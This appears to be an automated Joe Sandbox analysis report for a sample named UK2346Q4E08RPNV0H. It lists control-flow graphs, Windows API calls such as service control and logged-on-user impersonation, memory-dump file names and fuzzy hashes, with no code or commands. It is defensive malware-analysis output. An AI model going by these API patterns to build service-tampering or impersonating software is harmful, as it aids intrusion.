
                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 91 4930d48-4930d97 93 4930d99-4930d9c 91->93 94 4930d9f-4930da3 91->94 93->94 95 4930da5-4930da8 94->95 96 4930dab-4930dda OpenSCManagerW 94->96 95->96 97 4930de3-4930df7 96->97 98 4930ddc-4930de2 96->98 98->97
                                                                              APIs
                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04930DCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID: ym
                                                                              • API String ID: 1889721586-2567925931
                                                                              • Opcode ID: 38406148e75f9d239385388501b20efd44d2f58a0f8a1439258a33a9c31afee6
                                                                              • Instruction ID: 743f80da1cac8eba748cdc9102c8b9f00462052e1f5fddcb96b9a980c7cf795e
                                                                              • Opcode Fuzzy Hash: 38406148e75f9d239385388501b20efd44d2f58a0f8a1439258a33a9c31afee6
                                                                              • Instruction Fuzzy Hash: E62133B6C003099FDB10CF99D884BDEFBF4EB88720F14812AD818AB208C734A540CBA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 100 4930d43-4930d97 102 4930d99-4930d9c 100->102 103 4930d9f-4930da3 100->103 102->103 104 4930da5-4930da8 103->104 105 4930dab-4930dda OpenSCManagerW 103->105 104->105 106 4930de3-4930df7 105->106 107 4930ddc-4930de2 105->107 107->106
                                                                              APIs
                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 04930DCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ManagerOpen
                                                                              • String ID: ym
                                                                              • API String ID: 1889721586-2567925931
                                                                              • Opcode ID: 16507e51393793890778e271f62292e168e8869b2509664e66ee1cd9754d04ae
                                                                              • Instruction ID: da2fe4cd9aad8acf40f526d4f440252f1bbe0d6fadd2cac7ccb3cfa49ae547d7
                                                                              • Opcode Fuzzy Hash: 16507e51393793890778e271f62292e168e8869b2509664e66ee1cd9754d04ae
                                                                              • Instruction Fuzzy Hash: 082104B6C003098FDB40CF99D585BDEFBF5EB88310F14812AD918AB248D774A545CBA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 109 4931510-493158d ControlService 111 4931596-49315b7 109->111 112 493158f-4931595 109->112 112->111
                                                                              APIs
                                                                              • ControlService.ADVAPI32(?,?,?), ref: 04931580
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ControlService
                                                                              • String ID: ym
                                                                              • API String ID: 253159669-2567925931
                                                                              • Opcode ID: ae5be26e7b42861bc88cb3ef6916cc24082c2a7210e5ca20b4ec349513523e76
                                                                              • Instruction ID: d8235695567c285ad08d9062f5abe5c4aed48daf3e716d0187edfaedcf4f318a
                                                                              • Opcode Fuzzy Hash: ae5be26e7b42861bc88cb3ef6916cc24082c2a7210e5ca20b4ec349513523e76
                                                                              • Instruction Fuzzy Hash: CB11E2B1D003499FDB10CF9AC585BDEFBF4EB48320F10802AE959A7250D778AA44CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 114 4931509-4931550 115 4931558-493158d ControlService 114->115 116 4931596-49315b7 115->116 117 493158f-4931595 115->117 117->116
                                                                              APIs
                                                                              • ControlService.ADVAPI32(?,?,?), ref: 04931580
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ControlService
                                                                              • String ID: ym
                                                                              • API String ID: 253159669-2567925931
                                                                              • Opcode ID: fb8df14cf0f2a5420fa87d1b2eae2ee76299e9ee2677084eb55610a904487a1b
                                                                              • Instruction ID: 8d793fadd15e96e6ae9b55f45da6c3b86d123471d80fd25a0ac98a9b6507ee41
                                                                              • Opcode Fuzzy Hash: fb8df14cf0f2a5420fa87d1b2eae2ee76299e9ee2677084eb55610a904487a1b
                                                                              • Instruction Fuzzy Hash: 332114B5D00309CFDB10CF9AD585BEEFBF4AB48321F10842AD558A7250D778AA44CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 119 4931301-4931341 120 4931349-4931374 ImpersonateLoggedOnUser 119->120 121 4931376-493137c 120->121 122 493137d-493139e 120->122 121->122
                                                                              APIs
                                                                              • ImpersonateLoggedOnUser.KERNELBASE(?), ref: 04931367
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ImpersonateLoggedUser
                                                                              • String ID: ym
                                                                              • API String ID: 2216092060-2567925931
                                                                              • Opcode ID: 4b05030be593ae31e6cc63ac71c5455609a38b237506efe39adca42ac6a5400b
                                                                              • Instruction ID: 0785b4ccb6a02685f40856bbf767bf4e01734e55d53b491a2b419d56840e7f7e
                                                                              • Opcode Fuzzy Hash: 4b05030be593ae31e6cc63ac71c5455609a38b237506efe39adca42ac6a5400b
                                                                              • Instruction Fuzzy Hash: C61125B1800249CFEB10CF9AD585BEEFBF4EF48324F20846AD558A7650D778A584CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 124 4931308-4931374 ImpersonateLoggedOnUser 126 4931376-493137c 124->126 127 493137d-493139e 124->127 126->127
                                                                              APIs
                                                                              • ImpersonateLoggedOnUser.KERNELBASE(?), ref: 04931367
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2738481178.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_4930000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: ImpersonateLoggedUser
                                                                              • String ID: ym
                                                                              • API String ID: 2216092060-2567925931
                                                                              • Opcode ID: fb71b014a2b9dd46b15f82303403a2f69499e9774ca818b81bb9016e01cf4ad8
                                                                              • Instruction ID: facf2bbda924975bc33c8200feb66dec32f3a6ababd07d6fbb3ddcf4183c97c4
                                                                              • Opcode Fuzzy Hash: fb71b014a2b9dd46b15f82303403a2f69499e9774ca818b81bb9016e01cf4ad8
                                                                              • Instruction Fuzzy Hash: F51136B1800349CFDB10CF9AC545BDEFBF8EB48320F20842AD558A3650D778A544CFA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 301 e37de1-e37dea LoadLibraryA 302 e37df0-e37df1 301->302 303 e37df7 302->303 304 e37e09-e37e2f 302->304 303->304 307 e37e41-e37f5a 304->307 308 e37e35 304->308 310 e37f5d 307->310 308->307 309 e37e3b-e37e40 308->309 309->307 310->310
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: cb8a2fce5b7ef51c58aa709b408ffb2a85fd40624127fec9fd98f380b7da8207
                                                                              • Instruction ID: 8774363b0166fcf274f34075d5f781ba81269ea1b60b91b2e369be6671597a81
                                                                              • Opcode Fuzzy Hash: cb8a2fce5b7ef51c58aa709b408ffb2a85fd40624127fec9fd98f380b7da8207
                                                                              • Instruction Fuzzy Hash: 04317EF210C200AFE7056F5AD945ABAFBE9FB99330F22482EF5C5D2200E37548449A67

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 311 e3c4fe-e3c52f CreateFileA 313 e3c705-e3c727 call e3c72a 311->313 314 e3c535-e3c542 311->314 316 e3c548 314->316 317 e3c54e-e3c550 314->317 316->317 319 e3c556 317->319 320 e3c55c-e3c588 317->320 319->320 323 e3c5a3-e3c5fe call e3c600 320->323 324 e3c58e-e3c593 call e3c5a2 320->324 323->313
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 9638f86ad89175c054a9f3e778f80ce3d1764a823ab0c87f206ee31d98f0c332
                                                                              • Instruction ID: 5ffc9026a9cf6b13317a159e1f665254efda3154bf402d3ab8f707666b12e97d
                                                                              • Opcode Fuzzy Hash: 9638f86ad89175c054a9f3e778f80ce3d1764a823ab0c87f206ee31d98f0c332
                                                                              • Instruction Fuzzy Hash: BF21DEBA1081153EF2019A226E59AFB6B6DE3C1B35F30A51BF802F5042C2958D09A734

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 342 e3c514-e3c52f CreateFileA 343 e3c705-e3c727 call e3c72a 342->343 344 e3c535-e3c542 342->344 346 e3c548 344->346 347 e3c54e-e3c550 344->347 346->347 349 e3c556 347->349 350 e3c55c-e3c588 347->350 349->350 353 e3c5a3-e3c5fe call e3c600 350->353 354 e3c58e-e3c593 call e3c5a2 350->354 353->343
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731433274.0000000000EB7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731450545.0000000000EBD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731467094.0000000000EC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731483381.0000000000ECA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731502458.0000000000ED3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731520743.0000000000ED8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731537956.0000000000EDE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731555186.0000000000EE2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731574229.0000000000EE9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731593456.0000000000EEB000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731610955.0000000000EF2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731630934.0000000000EF5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731654777.0000000000F12000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731673934.0000000000F15000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731700240.0000000000F42000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731717712.0000000000F43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F50000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731736854.0000000000F56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731772581.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731789510.0000000000F68000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_cb0000_UK2346Q4E08RPNV0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: b2f221aded2b1a9833684c04f993baca4f4fe341578009341227b16a3c78ee44
                                                                              • Instruction ID: d1414bef621edf540c61b6d6e0dbb17427476deeb70207fa150574a743644743
                                                                              • Opcode Fuzzy Hash: b2f221aded2b1a9833684c04f993baca4f4fe341578009341227b16a3c78ee44
                                                                              • Instruction Fuzzy Hash: EEF090F71081167D76108D55AE849FFBB6EE6C1339B31B516F802E1406C3A5AC4A9771
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2731069392.0000000000E35000.00000040.00000001.01000000.00000006.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000006.00000002.2730877114.0000000000CB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730909764.0000000000CB6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730926276.0000000000CBA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2730944102.0000000000CC6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731030790.0000000000E24000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731050392.0000000000E26000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731087206.0000000000E38000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E39000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731103687.0000000000E43000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731143684.0000000000E45000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731161417.0000000000E4C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731179687.0000000000E56000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731197141.0000000000E59000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731214779.0000000000E5A000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731232310.0000000000E5D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731254811.0000000000E75000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731295932.0000000000E88000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731319251.0000000000E93000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731340280.0000000000E96000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731358682.0000000000E98000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731375774.0000000000E9B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731398740.0000000000EB3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000006.00000002.2731415815.0000000000EB6000.00000040.00000001.01000000.00000006.sdmpDownload File
